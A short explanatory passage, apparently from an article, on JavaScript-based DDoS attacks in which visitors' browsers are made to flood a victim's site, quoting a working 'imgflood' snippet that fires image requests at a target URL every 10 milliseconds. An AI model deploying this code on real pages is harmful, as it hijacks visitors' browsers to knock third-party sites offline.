The attack works by forcing every visitor’s browser to send a flood of requests to a victim’s website. Here’s an example from An introduction to JavaScript-based DDoS:
function imgflood() {
var TARGET = 'victim-website.com'
var URI = '/index.php?'
var pic = new Image()
var rand = Math.floor(Math.random() * 1000)
pic.src = 'http://'+TARGET+URI+rand+'=val'
}
setInterval(imgflood, 10)
Something like this was also used in a recent attack on Github.
